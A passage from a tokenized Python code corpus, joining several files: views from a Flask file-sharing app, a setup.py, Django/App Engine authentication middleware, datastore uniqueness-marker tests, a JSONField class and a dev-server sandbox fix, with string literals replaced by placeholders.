short_id ) : <EOL> """<STR_LIT>""" <EOL> db , fs = current_app . db , current_app . fs <EOL> obj = fs . get ( short_id = short_id ) <EOL> if obj is None : <EOL> abort ( <NUM_LIT> ) <EOL> if request . accept_mimetypes . accept_html : <EOL> if getattr ( obj , '<STR_LIT>' , None ) : <EOL> abort ( <NUM_LIT> ) <EOL> if obj . item_type != '<STR_LIT:image>' : <EOL> fs . inc_count ( obj . _id ) <EOL> if obj . item_type == '<STR_LIT>' : <EOL> return redirect ( obj . redirect_url ) <EOL> drop = Drop ( obj , current_app . config , urlscheme ( request ) ) <EOL> if drop . item_type == '<STR_LIT:image>' : <EOL> return render_template ( '<STR_LIT>' , drop = drop ) <EOL> elif drop . item_type == '<STR_LIT:text>' : <EOL> return render_template ( '<STR_LIT>' , drop = drop ) <EOL> else : <EOL> return render_template ( '<STR_LIT>' , drop = drop ) <EOL> return jsonify ( Item ( obj , current_app . config , urlscheme ( request ) ) ) <EOL> @ login <EOL> def items_edit ( object_id ) : <EOL> """<STR_LIT>""" <EOL> conf , db , fs = current_app . config , current_app . db , current_app . fs <EOL> item = db . items . find_one ( { '<STR_LIT>' : request . authorization . username , <EOL> '<STR_LIT>' : object_id } ) <EOL> if not item : <EOL> abort ( <NUM_LIT> ) <EOL> if request . method == '<STR_LIT>' : <EOL> item [ '<STR_LIT>' ] = strftime ( '<STR_LIT>' , gmtime ( ) ) <EOL> elif request . method == '<STR_LIT>' : <EOL> try : <EOL> data = json . loads ( request . data ) [ '<STR_LIT>' ] <EOL> key , value = data . items ( ) [ <NUM_LIT:0> ] <EOL> if not key in [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] : raise ValueError <EOL> except ValueError : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if key == '<STR_LIT:name>' and item [ '<STR_LIT>' ] != '<STR_LIT>' : <EOL> item [ '<STR_LIT:filename>' ] = value <EOL> elif key == '<STR_LIT>' and item [ '<STR_LIT>' ] == '<STR_LIT>' and value and not conf [ '<STR_LIT>' ] : <EOL> pass <EOL> else : <EOL> item [ key ] = value <EOL> item [ '<STR_LIT>' ] = strftime ( '<STR_LIT>' , gmtime ( ) ) <EOL> db . items . save ( item ) <EOL> item = fs . get ( item [ '<STR_LIT>' ] ) <EOL> return jsonify ( Item ( item , conf , urlscheme ( request ) ) ) <EOL> @ private ( lambda req : True ) <EOL> def blob ( short_id , filename ) : <EOL> """<STR_LIT>""" <EOL> fs = current_app . fs <EOL> obj = fs . get ( short_id = short_id ) <EOL> if obj is None or getattr ( obj , '<STR_LIT>' , None ) : <EOL> abort ( <NUM_LIT> ) <EOL> fs . inc_count ( obj . _id ) <EOL> if obj . item_type == '<STR_LIT>' : <EOL> return redirect ( obj . redirect_url ) <EOL> elif not obj . content_type . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] in [ '<STR_LIT:image>' , '<STR_LIT:text>' ] : <EOL> return Response ( obj , content_type = obj . content_type , headers = { '<STR_LIT>' : <EOL> '<STR_LIT>' % basename ( obj . filename ) } ) <EOL> return Response ( obj , content_type = obj . content_type ) <EOL> @ login <EOL> def trash ( ) : <EOL> """<STR_LIT>""" <EOL> empty = current_app . db . items . find ( <EOL> { '<STR_LIT>' : request . authorization . username , '<STR_LIT>' : { '<STR_LIT>' : None } } ) <EOL> for item in empty : <EOL> current_app . fs . delete ( item ) <EOL> return '<STR_LIT>' , <NUM_LIT:200> <EOL> def register ( ) : <EOL> """<STR_LIT>""" <EOL> conf , db = current_app . config , current_app . db <EOL> if len ( request . data ) > <NUM_LIT:200> : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> try : <EOL> d = json . loads ( request . data ) <EOL> email = d [ '<STR_LIT:user>' ] [ '<STR_LIT:email>' ] <EOL> if email . isdigit ( ) : raise ValueError <EOL> passwd = d [ '<STR_LIT:user>' ] [ '<STR_LIT:password>' ] <EOL> except ( ValueError , KeyError ) : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if filter ( lambda c : not c in conf [ '<STR_LIT>' ] , email ) : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if db . accounts . find_one ( { '<STR_LIT:email>' : email } ) != None : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if not db . accounts . find_one ( { "<STR_LIT>" : "<STR_LIT>" } ) : <EOL> db . accounts . insert ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:1> } ) <EOL> account = Account ( { '<STR_LIT:email>' : email , '<STR_LIT>' : passwd , <EOL> '<STR_LIT:id>' : db . accounts . find_one ( { '<STR_LIT>' : '<STR_LIT>' } ) [ '<STR_LIT>' ] } , conf ) <EOL> db . accounts . update ( { '<STR_LIT>' : '<STR_LIT>' } , { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> if conf [ '<STR_LIT>' ] : <EOL> account [ '<STR_LIT>' ] = strftime ( '<STR_LIT>' , gmtime ( ) ) <EOL> account [ '<STR_LIT>' ] = account [ '<STR_LIT:id>' ] <EOL> db . accounts . insert ( account ) <EOL> return ( jsonify ( clear ( account ) ) , <NUM_LIT> ) <EOL> @ login <EOL> def bookmark ( ) : <EOL> """<STR_LIT>""" <EOL> conf , db = current_app . config , current_app . db <EOL> def insert ( name , redirect_url ) : <EOL> acc = db . accounts . find_one ( { '<STR_LIT:email>' : request . authorization . username } ) <EOL> _id = str ( getrandbits ( <NUM_LIT:32> ) ) <EOL> retry_count = <NUM_LIT:1> <EOL> short_id_length = conf [ '<STR_LIT>' ] <EOL> while True : <EOL> short_id = slug ( short_id_length ) <EOL> if not db . items . find_one ( { '<STR_LIT>' : short_id } ) : <EOL> break <EOL> else : <EOL> retry_count += <NUM_LIT:1> <EOL> if retry_count > <NUM_LIT:3> : <EOL> short_id_length += <NUM_LIT:1> <EOL> retry_count = <NUM_LIT:1> <EOL> x = { <EOL> '<STR_LIT>' : request . authorization . username , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : _id , <EOL> '<STR_LIT>' : slug ( short_id_length ) , <EOL> '<STR_LIT>' : redirect_url , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : request . form . get ( '<STR_LIT>' , acc [ '<STR_LIT>' ] ) <EOL> if conf [ '<STR_LIT>' ] else False , <EOL> '<STR_LIT:source>' : request . headers . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : strftime ( '<STR_LIT>' , gmtime ( ) ) , <EOL> '<STR_LIT>' : strftime ( '<STR_LIT>' , gmtime ( ) ) , <EOL> } <EOL> item = Item ( x , conf , urlscheme ( request ) ) <EOL> db . items . insert ( x ) <EOL> items = acc [ '<STR_LIT>' ] <EOL> items . append ( _id ) <EOL> db . accounts . update ( { '<STR_LIT>' : acc [ '<STR_LIT>' ] } , { '<STR_LIT>' : { '<STR_LIT>' : items } } , upsert = False ) <EOL> return item <EOL> try : <EOL> data = json . loads ( request . data ) <EOL> data = data [ '<STR_LIT>' ] <EOL> except ( ValueError , KeyError ) : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if isinstance ( data , list ) : <EOL> return json . dumps ( [ insert ( d [ '<STR_LIT:name>' ] , d [ '<STR_LIT>' ] ) for d in data ] ) <EOL> else : <EOL> return jsonify ( insert ( data [ '<STR_LIT:name>' ] , data [ '<STR_LIT>' ] ) ) <EOL> @ private ( lambda req : True ) <EOL> def thumb ( short_id ) : <EOL> """<STR_LIT>""" <EOL> rv = current_app . fs . get ( short_id = short_id ) <EOL> if rv is None or getattr ( obj , '<STR_LIT>' , None ) : <EOL> abort ( <NUM_LIT> ) <EOL> if rv . item_type == '<STR_LIT:image>' and current_app . config [ '<STR_LIT>' ] : <EOL> try : <EOL> th = thumbnail ( rv ) <EOL> return Response ( standard_b64decode ( th ) , <NUM_LIT:200> , content_type = '<STR_LIT>' ) <EOL> except IOError : <EOL> pass <EOL> return Response ( open ( '<STR_LIT>' % rv . item_type ) , <EOL> <NUM_LIT:200> , content_type = '<STR_LIT>' ) <EOL> def domains ( domain ) : <EOL> """<STR_LIT>""" <EOL> return jsonify ( { "<STR_LIT>" : "<STR_LIT>" % current_app . config [ '<STR_LIT>' ] } ) </s>
<s> from distutils . core import setup <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as readme : <EOL> LONG_DESCRIPTION = readme . read ( ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> requires = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> packages = [ '<STR_LIT>' ] , <EOL> long_description = LONG_DESCRIPTION , <EOL> ) </s>
<s> from django . contrib . auth import authenticate , login , logout , get_user , BACKEND_SESSION_KEY , load_backend <EOL> from django . contrib . auth . middleware import AuthenticationMiddleware as DjangoMiddleware <EOL> from django . contrib . auth . models import BaseUserManager , AnonymousUser <EOL> from djangae . contrib . gauth . common . backends import BaseAppEngineUserAPIBackend <EOL> from google . appengine . api import users <EOL> class AuthenticationMiddleware ( DjangoMiddleware ) : <EOL> def process_request ( self , request ) : <EOL> django_user = get_user ( request ) <EOL> google_user = users . get_current_user ( ) <EOL> if django_user . is_authenticated ( ) : <EOL> backend_str = request . session . get ( BACKEND_SESSION_KEY ) <EOL> if ( not backend_str ) or not isinstance ( load_backend ( backend_str ) , BaseAppEngineUserAPIBackend ) : <EOL> request . user = django_user <EOL> return <EOL> if django_user . is_anonymous ( ) and google_user : <EOL> django_user = authenticate ( google_user = google_user ) or AnonymousUser ( ) <EOL> if django_user . is_authenticated ( ) : <EOL> login ( request , django_user ) <EOL> if django_user . is_authenticated ( ) : <EOL> if not google_user : <EOL> logout ( request ) <EOL> django_user = AnonymousUser ( ) <EOL> elif django_user . username != google_user . user_id ( ) : <EOL> logout ( request ) <EOL> django_user = authenticate ( google_user = google_user ) or AnonymousUser ( ) <EOL> if django_user . is_authenticated ( ) : <EOL> login ( request , django_user ) <EOL> if django_user . is_authenticated ( ) : <EOL> is_superuser = users . is_current_user_admin ( ) <EOL> resave = False <EOL> if is_superuser != django_user . is_superuser : <EOL> django_user . is_superuser = django_user . is_staff = is_superuser <EOL> resave = True <EOL> if django_user . email != google_user . email ( ) : <EOL> django_user . email = google_user . email ( ) <EOL> resave = True <EOL> if resave : <EOL> django_user . save ( ) <EOL> request . user = django_user </s>
<s> from hashlib import md5 <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from unittest import skipIf <EOL> from google . appengine . api import datastore , datastore_errors <EOL> from . models import UniqueAction , encode_model <EOL> from djangae . test import TestCase , process_task_queues <EOL> from djangae . db . constraints import UniqueMarker , UniquenessMixin <EOL> DEFAULT_NAMESPACE = settings . DATABASES . get ( "<STR_LIT:default>" , { } ) . get ( "<STR_LIT>" ) <EOL> class TestModel ( UniquenessMixin , models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:32> , unique = True ) <EOL> counter1 = models . IntegerField ( ) <EOL> counter2 = models . IntegerField ( ) <EOL> class Meta : <EOL> unique_together = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> class MapperTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( MapperTests , self ) . setUp ( ) <EOL> self . i1 = TestModel . objects . create ( name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:1> ) <EOL> self . i2 = TestModel . objects . create ( name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:2> ) <EOL> self . i3 = self . i4 = None <EOL> def tearDown ( self ) : <EOL> if self . i3 : <EOL> self . i3 . delete ( ) <EOL> if self . i4 : <EOL> self . i4 . delete ( ) <EOL> super ( MapperTests , self ) . tearDown ( ) <EOL> def test_check_ok ( self ) : <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , a . actionlog_set . count ( ) ) <EOL> def test_check_missing_markers ( self ) : <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> datastore . Delete ( marker_key ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , a . actionlog_set . count ( ) ) <EOL> error = a . actionlog_set . all ( ) [ <NUM_LIT:0> ] <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> self . assertEqual ( error . log_type , "<STR_LIT>" ) <EOL> self . assertEqual ( error . instance_key , str ( instance_key ) ) <EOL> self . assertEqual ( error . marker_key , str ( marker_key ) ) <EOL> def test_check_missing_instance_attr ( self ) : <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> marker = datastore . Get ( marker_key ) <EOL> marker [ '<STR_LIT>' ] = None <EOL> datastore . Put ( marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , a . actionlog_set . count ( ) ) <EOL> error = a . actionlog_set . all ( ) [ <NUM_LIT:0> ] <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> self . assertEqual ( error . log_type , "<STR_LIT>" ) <EOL> self . assertEqual ( error . instance_key , str ( instance_key ) ) <EOL> self . assertEqual ( error . marker_key , str ( marker_key ) ) <EOL> def test_repair_missing_markers ( self ) : <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> datastore . Delete ( marker_key ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , a . actionlog_set . count ( ) ) <EOL> marker = datastore . Get ( marker_key ) <EOL> self . assertTrue ( marker ) <EOL> self . assertTrue ( isinstance ( marker [ "<STR_LIT>" ] , datastore . Key ) ) <EOL> self . assertEqual ( instance_key , marker [ "<STR_LIT>" ] ) <EOL> self . assertTrue ( marker [ "<STR_LIT>" ] ) <EOL> def test_check_old_style_marker ( self ) : <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> marker = datastore . Get ( marker_key ) <EOL> marker [ '<STR_LIT>' ] = str ( instance_key ) <EOL> datastore . Put ( marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , a . actionlog_set . count ( ) ) <EOL> error = a . actionlog_set . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( error . log_type , "<STR_LIT>" ) <EOL> self . assertEqual ( error . instance_key , str ( instance_key ) ) <EOL> self . assertEqual ( error . marker_key , str ( marker_key ) ) <EOL> def test_repair_old_style_marker ( self ) : <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> marker = datastore . Get ( marker_key ) <EOL> marker [ '<STR_LIT>' ] = str ( instance_key ) <EOL> datastore . Put ( marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , a . actionlog_set . count ( ) ) <EOL> marker = datastore . Get ( marker_key ) <EOL> self . assertTrue ( marker ) <EOL> self . assertEqual ( marker [ '<STR_LIT>' ] , instance_key ) <EOL> def test_repair_missing_instance_attr ( self ) : <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> marker = datastore . Get ( marker_key ) <EOL> marker [ '<STR_LIT>' ] = None <EOL> datastore . Put ( marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , a . actionlog_set . count ( ) ) <EOL> marker = datastore . Get ( marker_key ) <EOL> self . assertTrue ( marker ) <EOL> self . assertEqual ( marker [ '<STR_LIT>' ] , instance_key ) <EOL> def test_clean_after_instance_deleted ( self ) : <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i1 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> self . assertTrue ( datastore . Get ( marker_key ) ) <EOL> datastore . Delete ( datastore . Key . from_path ( TestModel . _meta . db_table , self . i1 . pk , namespace = DEFAULT_NAMESPACE ) ) <EOL> self . assertTrue ( datastore . Get ( marker_key ) ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> self . assertRaises ( datastore_errors . EntityNotFoundError , datastore . Get , marker_key ) <EOL> def test_clean_removes_markers_with_different_values ( self ) : <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i1 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> original_marker = datastore . Get ( marker_key ) <EOL> marker2 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( "<STR_LIT>" ) . hexdigest ( ) ) <EOL> new_marker = datastore . Entity ( UniqueMarker . kind ( ) , name = marker2 , namespace = DEFAULT_NAMESPACE ) <EOL> new_marker . update ( original_marker ) <EOL> datastore . Put ( new_marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) ) <EOL> process_task_queues ( ) <EOL> self . assertRaises ( datastore_errors . EntityNotFoundError , datastore . Get , new_marker . key ( ) ) <EOL> self . assertTrue ( datastore . Get ( marker_key ) ) <EOL> @ skipIf ( "<STR_LIT>" not in settings . DATABASES , "<STR_LIT>" ) <EOL> def test_clean_removes_markers_with_different_values_on_non_default_namespace ( self ) : <EOL> self . i3 = TestModel . objects . using ( "<STR_LIT>" ) . create ( id = self . i1 . pk , name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:1> ) <EOL> self . i4 = TestModel . objects . using ( "<STR_LIT>" ) . create ( id = self . i2 . pk , name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:2> ) <EOL> NS1_NAMESPACE = settings . DATABASES [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i3 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = NS1_NAMESPACE ) <EOL> default_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> original_marker = datastore . Get ( marker_key ) <EOL> default_marker = datastore . Get ( default_key ) <EOL> marker2 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( "<STR_LIT>" ) . hexdigest ( ) ) <EOL> new_marker = datastore . Entity ( UniqueMarker . kind ( ) , name = marker2 , namespace = NS1_NAMESPACE ) <EOL> new_marker . update ( original_marker ) <EOL> datastore . Put ( new_marker ) <EOL> self . i1 . delete ( ) <EOL> datastore . Put ( default_marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) , db = "<STR_LIT>" ) <EOL> process_task_queues ( ) <EOL> self . assertRaises ( datastore_errors . EntityNotFoundError , datastore . Get , new_marker . key ( ) ) <EOL> self . assertTrue ( datastore . Get ( default_marker . key ( ) ) ) <EOL> self . assertTrue ( datastore . Get ( marker_key ) ) <EOL> datastore . Delete ( default_marker ) <EOL> @ skipIf ( "<STR_LIT>" not in settings . DATABASES , "<STR_LIT>" ) <EOL> def test_repair_missing_markers_on_non_default_namespace ( self ) : <EOL> self . i3 = TestModel . objects . using ( "<STR_LIT>" ) . create ( id = self . i1 . pk , name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:1> ) <EOL> self . i4 = TestModel . objects . using ( "<STR_LIT>" ) . create ( id = self . i2 . pk , name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:2> ) <EOL> NS1_NAMESPACE = settings . DATABASES [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> instance_key_ns1 = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = NS1_NAMESPACE ) <EOL> marker = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key_default = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker , namespace = DEFAULT_NAMESPACE ) <EOL> marker_key_ns1 = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker , namespace = NS1_NAMESPACE ) <EOL> datastore . Delete ( marker_key_ns1 ) <EOL> datastore . Delete ( marker_key_default ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) , db = "<STR_LIT>" ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertRaises ( datastore_errors . EntityNotFoundError , datastore . Get , marker_key_default ) <EOL> marker = datastore . Get ( marker_key_ns1 ) <EOL> self . assertTrue ( marker ) <EOL> self . assertTrue ( isinstance ( marker [ "<STR_LIT>" ] , datastore . Key ) ) <EOL> self . assertEqual ( instance_key_ns1 , marker [ "<STR_LIT>" ] ) <EOL> self . assertTrue ( marker [ "<STR_LIT>" ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import json <EOL> from collections import OrderedDict <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from django . utils import six <EOL> from django . core . serializers . json import DjangoJSONEncoder <EOL> from djangae . forms . fields import JSONFormField , JSONWidget <EOL> __all__ = ( '<STR_LIT>' , ) <EOL> def dumps ( value ) : <EOL> return DjangoJSONEncoder ( ) . encode ( value ) <EOL> def loads ( txt , object_pairs_hook = None ) : <EOL> value = json . loads ( <EOL> txt , <EOL> encoding = settings . DEFAULT_CHARSET , <EOL> object_pairs_hook = object_pairs_hook , <EOL> ) <EOL> return value <EOL> class JSONDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return dumps ( self ) <EOL> class JSONUnicode ( six . text_type ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return dumps ( self ) <EOL> class JSONList ( list ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return dumps ( self ) <EOL> class JSONOrderedDict ( OrderedDict ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return dumps ( self ) <EOL> class JSONField ( models . TextField ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , use_ordered_dict = False , * args , ** kwargs ) : <EOL> if '<STR_LIT:default>' in kwargs : <EOL> if not callable ( kwargs [ '<STR_LIT:default>' ] ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> else : <EOL> kwargs [ '<STR_LIT:default>' ] = dict <EOL> self . use_ordered_dict = use_ordered_dict <EOL> models . TextField . __init__ ( self , * args , ** kwargs ) <EOL> def parse_json ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value is None or value == '<STR_LIT>' : <EOL> return { } <EOL> elif isinstance ( value , six . string_types ) : <EOL> if self . use_ordered_dict : <EOL> res = loads ( value , object_pairs_hook = OrderedDict ) <EOL> else : <EOL> res = loads ( value ) <EOL> if isinstance ( res , OrderedDict ) and self . use_ordered_dict : <EOL> return JSONOrderedDict ( res ) <EOL> elif isinstance ( res , dict ) : <EOL> return JSONDict ( ** res ) <EOL> elif isinstance ( res , six . string_types ) : <EOL> return JSONUnicode ( res ) <EOL> elif isinstance ( res , list ) : <EOL> return JSONList ( res ) <EOL> return res <EOL> else : <EOL> return value <EOL> def to_python ( self , value ) : <EOL> return self . parse_json ( value ) <EOL> def from_db_value ( self , value , expression , connection , context ) : <EOL> return self . parse_json ( value ) <EOL> def get_db_prep_save ( self , value , connection , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if value is None and self . null : <EOL> return None <EOL> return super ( JSONField , self ) . get_db_prep_save ( dumps ( value ) , connection = connection ) <EOL> def south_field_triple ( self ) : <EOL> """<STR_LIT>""" <EOL> from south . modelsinspector import introspector <EOL> field_class = "<STR_LIT>" <EOL> args , kwargs = introspector ( self ) <EOL> return ( field_class , args , kwargs ) <EOL> def deconstruct ( self ) : <EOL> name , path , args , kwargs = super ( JSONField , self ) . deconstruct ( ) <EOL> if self . default == { } : <EOL> del kwargs [ '<STR_LIT:default>' ] <EOL> return name , path , args , kwargs <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : JSONFormField , <EOL> '<STR_LIT>' : JSONWidget , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( JSONField , self ) . formfield ( ** defaults ) </s>
<s> from djangae . utils import on_production <EOL> def fix_c_whitelist ( ) : <EOL> from google . appengine . tools . devappserver2 . python import sandbox <EOL> if '<STR_LIT>' not in sandbox . _WHITE_LIST_C_MODULES : <EOL> sandbox . _WHITE_LIST_C_MODULES . extend ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] ) <EOL> if not on_production ( ) : <EOL> fix_c_whitelist ( ) <EOL> def fix_sandbox ( ) : <EOL> """<STR_LIT>""" <EOL> if on_production ( ) : <EOL> return <EOL> from google . appengine . tools . devappserver2 . python import sandbox <EOL> if '<STR_LIT>' not in sandbox . _WHITE_LIST_C_MODULES : <EOL> fix_c_whitelist ( ) <EOL> import imp <EOL> import os <EOL> import ast <EOL> psocket = os . path . join ( os . path . dirname ( ast . __file__ ) , '<STR_LIT>' ) <EOL> imp . load_source ( '<STR_LIT>' , psocket ) <EOL> class DjangaeApplication ( object ) : <EOL> def __init__ ( self , application ) : <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django import VERSION <EOL> for app in settings . INSTALLED_APPS : <EOL> if app . startswith ( "<STR_LIT>" ) : <EOL> raise ImproperlyConfigured ( "<STR_LIT>" ) <EOL> elif app == "<STR_LIT>" : <EOL> break <EOL> self . wrapped_app = application <EOL> def __call__ ( self , environ , start_response ) : <EOL> fix_sandbox ( ) <EOL> return self . wrapped_app ( environ , start_response ) </s>
